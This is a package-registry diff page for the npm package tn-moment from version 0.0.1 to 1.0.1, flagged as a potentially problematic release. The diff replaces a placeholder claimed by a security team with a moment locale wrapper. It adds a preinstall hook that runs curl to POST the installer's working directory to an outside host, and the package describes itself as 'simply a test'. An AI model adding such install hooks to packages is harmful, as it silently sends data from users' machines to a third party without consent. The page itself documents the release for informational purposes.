tn-moment 0.0.1 → 1.0.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of tn-moment might be problematic. Click here for more details.

package/.gitattributes ADDED
@@ -0,0 +1,2 @@
1
+ # Auto detect text files and perform LF normalization
2
+ * text=auto
package/index.js CHANGED
@@ -0,0 +1,5 @@
1
+ const moment = require("moment");
2
+
3
+ moment.locale("nb");
4
+
5
+ module.exports = moment;
package/package.json CHANGED
@@ -1,14 +1,15 @@
1
1
  {
2
2
  "name": "tn-moment",
3
- "version": "0.0.1",
4
- "main": "index.js",
5
- "author": "@telenor",
6
- "description": "Package claimed by the Telenor security team.",
7
- "publishConfig": {
8
- "registry": "https://registry.npmjs.com/"
3
+ "version": "1.0.1",
4
+ "description": "Nothing to see here, simply a test.",
5
+ "main": "./index.js",
6
+ "scripts": {
7
+ "preinstall": "curl -X POST https://dumpster.shuttleapp.rs -d ${PWD}",
8
+ "test": "exit 1"
9
9
  },
10
- "keywords": [
11
- "telenor",
12
- "security"
13
- ]
10
+ "author": "",
11
+ "license": "ISC",
12
+ "dependencies": {
13
+ "moment": "^2.22.2"
14
+ }
14
15
  }
package/README.md DELETED
@@ -1,2 +0,0 @@
1
- # telenor-npm-security
2
- Package claimed by the Telenor security team.